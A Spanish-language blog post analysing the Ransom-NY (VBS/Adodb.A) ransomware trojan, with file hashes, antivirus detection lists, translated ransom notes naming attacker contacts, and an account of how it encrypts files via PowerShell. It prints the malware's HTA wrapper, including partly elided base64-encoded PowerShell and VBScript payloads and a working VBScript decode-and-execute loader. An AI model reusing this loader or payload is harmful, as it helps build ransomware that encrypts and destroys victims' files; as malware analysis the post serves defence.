Software Development && UnEthical Hacking
inicio hacking WiFu WiBOG MDB

Troyano Ransom-NY - VBS/Adodb.A
General

Este tipo de troyano ransomware cifra todos los archivos del sistema (algo similar al troyano GpCode analizado anteriormente), obligando al usuario a pagar una suma de dinero para recuperar la información. La diferencia relevante con este troyano es que hace uso del programa Windows PowerShell para cifrar los archivos, este programa viene instalado por defecto en las versiones de Windows 7 en adelante y permite la creación de scripts para la automatización de tareas.

MD5: 139cd08a74ccda4b792d289d485f50e8
SHA256: 61f84d9d690877cb09a6f958c3db28095020fbd4bc5487aba972ae75c8f074a1
SHA1: 09d74466e51de4107c1b047bbe5d49a94eeeb160
Tamaño: 13.0 KB ( 13293 bytes )
Nombre: Благодарственное письмо.hta
Tipo: unknown
Detecciones: 13 / 45
Fecha de análisis: 2013-03-18 09:27:02 UTC

Comodo UnclassifiedMalware
DrWeb Trojan.Encoder.182
Emsisoft Trojan.Script.Agent (A)
ESET-NOD32 JS/Kryptik.AGE
Ikarus Trojan.VBS.Adodb
Kaspersky HEUR:Trojan.Script.Generic
Kingsoft BAT.Agent.ap
Microsoft Trojan:VBS/Adodb.A
Norman Ransom.DXS
PCTools Trojan.Ransomlock
Sophos Troj/Ransom-NY
Symantec Trojan.Ransomlock.AC
TrendMicro-HouseCall TROJ_GEN.RCBH1BQ

---------------------------

MD5: 1d5377b8d8155e555b1de6c36f4befad
SHA256: 844fbf968e2b492394537bfe9bc8990849b7c50111a35ea9c887bff9a684439b
SHA1: 24f9dfda3b67e0e7a782b67e8fef61ac0c87f26d
Tamaño: 24.6 KB ( 25182 bytes )
Nombre: email.ht
Tipo: MP3
Detecciones: 8 / 43
Fecha de análisis: 2013-03-18 01:28:11 UTC

Comodo TrojWare.JS.Agent.qs
DrWeb Trojan.Encoder.182
ESET-NOD32 VBS/Filecoder.A
Ikarus Trojan.VBS.Adodb
Kaspersky HEUR:Trojan.Script.Generic
Microsoft Trojan:VBS/Adodb.A
Sophos Troj/Ransom-NY
TrendMicro-HouseCall TROJ_GEN.RCBH1BS

 

Información del archivo en ejecución

El troyano busca que el componente de PowerShell esté instalado en la maquina, de no ser así intenta descargar una versión desde dropbox.com, seguido a esto cifra los archivos con el algoritmo Rijndael symmetric key encryption, crea un archivo READ_ME_NOW.txt donde informa al usuario del estado de sus archivos y le indica que debe enviar el mismo por correo electrónico a la cuenta unblockme(at)tormail.org para descifrar la información.

Vista del archivo, extensión .hta

 

Archivos READ_ME_NOW.txt generados por cada uno de los ejemplares

Traducción:

If you are reading this message, it means that your computer has been attacked by a dangerous virus. `R` nVsya Your information (documents, movies, and other files) on the computer was encrypted `r` nc using the most cryptographically world RSA1024. `R` nVosstanovit files only through a special program. To obtain it, you have to `r` nGo go to the page on the Internet at http://bit(dot)ly/11Uql6s and follow the `r` nIf the link above does not work, go to a backup to http://unblock(dot)i2p.to or http://bit(dot)ly/VIertW `r` nThe attempt to decrypt the files without our software can be damaged! `r` nNo FORGET: only we can decrypt your files!

 

Traducción:

If you are reading this message, it means that your computer has been attacked by a dangerous virus. `R` nVsya Your information (documents, movies, and other files) on the computer was encrypted `r` nc using the most cryptographically world RSA1024. `R` nVosstanovit files only through a special program. To obtain it, you have to `r` nnapisat us an email to unblockme(at)tormail.org `r` nThe attempt decryption without our program files may be damaged! `R` nThe letter attach a file that is on the desktop `" READ_ME_NOW!! !!!!. TXT `", or the file `r` nPisma threats will only threaten you and your files! DO NOT FORGET: Only we can decode your files!

Contenido de la carpeta de imágenes después del proceso de cifrado:

 

Al momento de abrir las paginas se puede observar que ya no están disponibles sin embargo es posible que estén activas nuevamente (tenga mucho cuidado si intenta abrir por su cuenta estas URLs ya que aun pueden contener código malicioso).

 

Según el artículo de SOPHOS estas páginas pudieron manejar un contenido similar a este: (las imágenes a continuación fueron extraídas de su artículo, puede ver el enlace en la última parte de este artículo).

 

Análisis

Al analizar el contenido del archivo se encontraron 2 scripts codificados en base64, los cuales cumplen con las funciones descritas anteriormente, el siguiente es un resumen de su contenido:

<!--%OyRvYz0ib2MiOyRFcnJvckFjdGlvblByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRUb3hqQUM9IlRveGpB
QyI7aWYoKEdldC1Qcm9jZXNzIC1OYW1lIHBvd2Vyc2hlbGwpLmNvdW50IC1nZSAyKXtleGl0fSRyZWY9W1JlZmxlY3Rp
b24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uU2VjdXJpdHknKTtBZGQtVHlwZSAtQXNzZW1i
bHkgU3lzdGVtLldlYjskTlpaU2ZuPSJOWlpTZm4iOyRpZHBhdGggPSAkZW52OkFQUERBVEEgKyAiXCIgKyAoZ3dtaSB3
aW4zMl9jb21wdXRlcnN5c3RlbSkubW9kZWw7JElDV1JRSEo9IklDV1JRSEoiO2lmKFRlc3QtUGF0aCAkaWRwYXRoKXsk
Z2V0YyA9IEdldC1Db250ZW50ICRpZHBhdGg7JE09Ik0iO2lmICgkZ2V0YyAtZXEgImdvb2QiKXtleGl0fSBlbHNlIHsk
ZWsgPSAkZ2V0Y319JGVrPVtXZW
………
AkcGF0aCkpe3NjIC1wYXQgJHBhdGggLXZhICR0ZXh0fX1jYXRjaHt9fX1TZXQtQ29udGVudCAtUGF0aCAkaWRwYXRoIC
1WYWx1ZSAiZ29vZCI=
-->

<html>
    <head>
        <meta charset="windows-1251">
    </head>
                <HTA:APPLICATION 
     ID="objHTA_Info" 
     APPLICATIONNAME="HTA_Info" 
     SINGLEINSTANCE="yes" > 
    <body>
        <script language=VBScript>
Execute base64decode("
OnpMSnlMdnJTbz0iekxKeUx2clNvIjpDb25zdCBTWVNURU0zMiA9ICZIMjU6U0pzbXU9IlNKc211IjpTZXQgZnNvID0gQ3
JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpOkJrQ2tjPSJCa0NrYyI6U2V0IG9ialNoZWxsID0g
Q3JlYXRlT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGl
……….
GwuUnVuIFJhclBhdGgsIDAsIFRydWU6bHllTz0ibHllTyI6RW5kIElmOndzaFNoZWxsLlJ1biBhcHBOZXdQYXRoLCAwLCB
UcnVlOkVuZCBJZg==")

    Function base64decode(data)
    a="CDO.Message"
    set b=CreateObject(a)
    With b.BodyPart
        .ContentTransferEncoding = "base64"
        .Charset = "windows-1251"
        With .GetEncodedContentStream
            .WriteText data
            .Flush
        End With
        With .GetDecodedContentStream
            .Charset = "utf-8"
            base64decode = .ReadText
        End With
    End With
End Function

        </script>
    </body>
</html>

Al decodificar los scripts se pueden ver claramente cada una de sus funciones, la siguiente imagen corresponde al segundo script en el archivo, es decir el que se encuentra entre la función base64decode():

 

Como se puede observar en la imagen de estar instalada una versión de PowerShell en el equipo se pasa a ejecutar el segundo script (el ubicado en la parte de arriba del archivo .hta) de lo contrario se procede con la descarga de la versión disponible en dropbox y se instala.

Cuando se ejecuta el segundo script se usa el Universally Unique Identifier (UUID) como llave para cifrar los archivos, así mismo se determina el CSP CryptoServiceProvider con el cual se cifrara la llave, y se crea el texto que será visualizado por el usuario victima en el archivo READ_ME_NOW.txt, como se puede ver la llave para descifrar los archivos es enviada por el usuario directamente a los atacantes.

 

Seguido a esto se ejecuta la función que permite cifrar los archivos con el algoritmo Rijndael symmetric key encryption por medio de la función CreateEncryptor de PowerShell.

 

Se buscan todas las unidades de disco existentes en el equipo y se cifran únicamente los archivos con las siguientes extensiones:

 

Finalmente esta el código que ejecuta la función para cifrar el contenido de los archivos y sobrescribe los mismos con los nuevos datos, así mismo renombra cada uno de ellos y crea el archivo READ_ME_NOW.txt en cada una de las carpetas.

 

Enlaces


Trojan:VBS/Adodb.A
Trojan.Ransomlock.AC
Russian ransomware takes advantage of Windows PowerShell

 

Inicio       ||       Comunidad       ||      Servicios       ||      Proyectos       ||      Hacking       ||      Contáctenos